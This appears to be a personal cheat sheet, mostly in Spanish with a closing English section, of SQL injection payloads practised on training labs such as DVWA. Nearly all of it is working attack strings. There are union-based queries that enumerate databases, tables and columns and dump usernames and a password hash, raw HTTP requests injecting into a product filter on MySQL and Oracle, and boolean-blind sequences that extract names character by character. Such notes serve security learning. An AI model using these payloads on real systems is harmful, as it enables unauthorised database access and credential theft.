SEACH SQL INYECTION

%28 = (
%29 = )
%3D%3D%3D : = = =
%2C = ,
%40%40 = @@
%2B = + ===> contat microsoft
%27 = '
+ = espacio

1' union select all null,null -- - #*__all__* (es opcional)

1'
1' order by 1,2 -- -
1' union select  null,null-- -
1' union select 'a','b' -- -
1' union select user(),null-- -                         #identificar usuarios en la BD
1' union select current_user(),null-- -
1' union select version(),null-- -
1' union select @@version,null -- -                                             #iden version
1' union select database().null-- -                                                #iden bases de datos
1' union select @@datadir,user()-- -                                           #iden datadirectorio(PATH) y el usuario
1' union select database(),@@datadir-- -                                   #iden bases de datos u datadirectorio(PATH)
1' union select user(),database()-- -                                            #iden usuario y bases de datos
1' union select @@hostname,null-- -                                          #iden nombre de host

1' union select null,concat_ws('===',user(),database()) from users-- -          #concat mysql
1' union select null,concat_ws('===',user(),database())

1' union select null,concat_ws('===',version(),@@datadir) from users-- -        #concat mysql
1' union select null,concat_ws('===',version(),@@datadir)-- -

1' union select null,concat_ws('===',@@version,@@hostname) from users-- -
1' union select null,concat_ws('==',@@version,@@hostname)-- -

##################################################################################################
                #obt todas la información de las "BD" 
1' union select null,schema_name from information_schema.schemata-- -
1' union select schema_name,null from information_schema.schemata-- -           #importante es ='dvwa'
1' union select null,concat(schema_name) from information_schema.schemata-- -   #uso de la concat
1' union select concat(schema_name),null from information_schema.schemata-- -
##################################################################################################

###########################################################################
                #obt all nombre de las tablas de la "BD"
1' union select table_name,null from information_schema.tables-- -
1' union select null,table_name from information_schema.tables-- -              #importante es = 'users'
1' union select concat(table_name),null from information_schema.tables-- -
1' union select null,concat(table_name) from information_schema.tables-- -
############################################################################

############################################################################
1' union select column_name,null from information_schema.columns-- -            #importante es = 'user','password'
1' union select null,concat(column_name) from information_schema.columns-- -
############################################################################

##################################################################################################
1' union select table_name,null from information_schema.tables where table_schema='dvwa'-- -
1' union select null,concat(table_name) from information_schema.tables WHERE table_schema='dvwa'-- -    #importante es ='users'
##################################################################################################

##################################################################################################
1' union select column_name,null from information_schema.columns WHERE table_name='users'-- -           #importante es ='user','password'
1' union select null,concat(column_name) from information_schema.columns WHERE table_name='users'-- -
##################################################################################################

##################################################################################################
1' union select user,null from users-- -             #importante es='admin'
1' union select password,null from users-- -    #importante es=5f4dcc3b5aa765d61d8327deb882cf99

1' union select user,password from users-- -    #ID: 1' union select user,password from users-- -
                                                First name: admin
                                                Surname: 5f4dcc3b5aa765d61d8327deb882cf99
        #concatenar....
1' union select null,concat_ws('{:}',user,password) from users-- -
r = admin{:}5f4dcc3b5aa765d61d8327deb882cf99
##################################################################################################
    

SACAR INFORMACION DE UNA TABLA EN """""MYSQL""""""
GET /filter?category=Gifts'+UNION+SELECT+NULL,schema_name+from+information_schema.schemata--+- HTTP/1.1
piblic
GET /filter?category=Gifts'+UNION+SELECT+NULL,table_name+from+information_schema.tables+where+table_schema='public'--+- HTTP/1.1
users_qbfkok
GET /filter?category=Gifts'+UNION+SELECT+NULL,column_name+from+information_schema.columns+where+table_schema='public'--+- HTTP/1.1
password_jbqadf
GET /filter?category=Gifts'+UNION+SELECT+NULL,column_name+from+information_schema.columns+where+table_name='users_qbfkok'--+- HTTP/1.1
username_aofcnl
password_jbqadf
Gifts'+UNION+SELECT username_aofcnl,password_jbqadf from users_qbfkok-- -


#######################################################################

SACAR INFORMACION DE UNA TABLA EN """""ORACLE""""""
GET /filter?category=Tech+gifts'+UNION+SELECT+distinct+owner,NULL+from+all_tables--+- HTTP/1.1
SYSTEM

GET /filter?category=Tech+gifts'+UNION+SELECT+owner,table_name+from+all_tables-- HTTP/1.1
SYSTEM
USERS_TPPENB

GET /filter?category=Tech+gifts'+UNION+SELECT+column_name,NULL+from+all_tab_columns+where+table_name='USERS_TPPENB'-- HTTP/1.1

USERNAME_UMSHHV
PASSWORD_ZSVPPV

USERNAME_UMSHHV, PASSWORD_ZSVPPV from USERS_TPPENB

#####################################################################################

BLIND SQL INYECTIONS

1=1' and length(substr((select database()),1)) = 4 -- -
User ID exists in the database.   =====> La base de datos tiene 4 letras en su nombre.

examinar cada comando
select database(); - Esto muestra el nombre de la base de datos.
select substring((select database()),1); Muestra el nombre de la base de datos pero desde con un comando substr.
select substring((select database()),1,1); - Muestra la primera letra del nombre de la base de datos 
select substring((select database()),2,1); - Muestra la segunda letra del nombre de la base de datos.

1' and substring((select database()),1,1) = 'd' -- -
1' and substring((select database()),2,1) = 'v' -- -
1' and substring((select database()),3,1) = 'w' -- -
1' and substring((select database()),4,1) = 'a' -- -

nombre de la base de datos es "dvwa"

SACAR "TABLE_NAME"
1' and substr((select count(*) from information_schema.tables where table_schema='dvwa'),1) = '1' -- -
1' and substr((select count(*) from information_schema.tables where table_schema='dvwa'),1) = '2' -- -

#En el segundo, obtendría un resultado positivo ya que hay dos tablas en la base de datos. Ahora que sabemos que hay dos tablas, podemos comenzar a obtener el nombre de la primera tabla.

PRIMERA TABLA
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),1,1) = 'a' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),2,1) = 'g' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),3,1) = 'u' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),4,1) = 'e' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),5,1) = 's' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),6,1) = 't' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),7,1) = 'b' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),8,1) = 'o' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),9,1) = 'o' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),10,1) = 'k' -- -

SEGUNDA TABLA
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),2,1) = 'a' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),2,1) = 'u' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),3,1) = 's' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),4,1) = 'e' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),5,1) = 'r' -- -
1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1),6,1) = 's' -- -

#####################

Column Name Enumeration via Blind SQL
1' and substr((select count(*) from information_schema.columns where table_schema='dvwa' and table_name = 'users'),1) = 1 -- -
1' and substr((select count(*) from information_schema.columns where table_schema='dvwa' and table_name = 'users'),1) = 8 -- -

Esto da como resultado encontrar 8 columnas en la tabla de 'users'. Y para encontrar el número de letras en el nombre de la primera columna, puede usar el siguiente código

1' and length(substr((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 1),1)) = '1' -- -
1' and length(substr((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 1),1)) = '7' -- -

 Hay 7 caracteres en el nombre de la primera columna de la tabla de users.

Y finalmente los nombres de las columnas.

1' and substr((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 1),1,1) = 'u' -- -
1' and substr((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 1),2,1) = 's' -- -
1' and substr((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 1),3,1) = 'e' -- -
1' and substr((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 1),4,1) = 'r' -- -


1' and substr((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 1),1,1) = 'u' -- -

Puede continuar esto hasta llegar al nombre de la columna 'usuarios'. Luego puede comenzar a trabajar en los nombres de la segunda, tercera, cuarta... columna hasta que los haya completado todos. Puede revisar cada nombre de columna adicional simplemente modificando las opciones de 'límite'.

limit 1 #Returns the first column.
limit 2,1 #Returns the second column.
limit 3,1 #Returns the third column.


A continuación se muestra un ejemplo de inyección de trabajar en la tercera columna y verificar si 'u' era el segundo carácter en su nombre, estaría debajo.

1' and substr((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 3, 1),2,1) = 'u' -- -


Enumeración de datos a través de Blind SQL
Entonces tiene el nombre de la base de datos, dvwa, y el nombre de la tabla, 'usuarios' y el nombre de la columna 'usuario'. Ahora, ¿cómo obtienes los datos en las filas? Me temo que es más de lo mismo que el anterior.

Identificar cuántas filas de datos hay,
Encuentre el número de caracteres en el conjunto de datos,
Pruebe todos los tipos de caracteres en mayúscula contra cada uno de los datos.
Letras pequeñas,
dígitos,
Caracteres no ascii

 A partir de 1, podemos identificar cuántas filas de datos hay con el siguiente código. Incrementando en uno cada vez hasta que tengamos un resultado 'Positivo'

1' and substr((select count(user) from dvwa.users),1) = '1' -- -
1' and substr((select count(user) from dvwa.users),1) = '5' -- -

Hay 5 filas de datos. Y ahora, identifique la longitud de la segunda fila, donde está comparando el número en negrita con la cantidad de caracteres en los datos.

1' and length(substr((select user from dvwa.users limit 2,1),1)) = '1'-- -
1' and length(substr((select user from dvwa.users limit 2,1),1)) = '4'-- -

Y ahora hemos identificado que la longitud de los datos es de 4 caracteres. Y finalmente en los datos en sí. El siguiente ejemplo funciona para identificar el carácter 3 en la segunda fila. Pero puede cambiarlo y modificarlo para que funcione en todas las filas y columnas para enumerar datos en cualquier lugar de la base de datos siempre que tenga,

Database name,
Table Name,
Column Name,
Length of the data,
Prove that there is data to enumerate,

1' and substr((select user from dvwa.users limit 2,1),3,1) = 'a' -- -

Y continúe enumerando todas las letras, dígitos y caracteres que no sean ascii hasta que encuentre los cuatro caracteres.




1. Low
Manual injection method

The server will only return and not display the search value. This kind of SQL injection without echo is called SQL blind injection.

This question will only return whether the user exists or not, that is, true or false. This kind of blind note becomes Boolean blind note.

The injection idea is to guess the length of library table fields and data. After each guess, guess the ascii value of each character, and then splice it to form characters.

1' and length(database())=4 #
Library length 4
1' and ascii(substr(database(),1,1))=100 #
1'+and+ascii(substr(database(),2,1))=118 #
1'+and+ascii(substr(database(),3,1))=119 #
1'+and+ascii(substr(database(),4,1))=97 #
Library name dvwa
------------------------------------------------------------------------------
1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2 #
Number of tables: 2
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #
First table length 9
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,2),1))=5 #
Second table length 5
------------------------------------------------------------------------------
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117 #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=115 #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=101 #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=114 #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))=115 #
Table name users
------------------------------------------------------------------------------
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8 #
The table has eight fields
1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 #
1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #
Inside and outside user and password field
------------------------------------------------------------------------------
1' and (select count(*) from users where user='admin' and password='5f4dcc3b5aa765d61d8327deb882cf99')=1 #
existence user by admin and password For 5 f4dcc3b5aa765d61d8327deb882cf99(password)Field for.

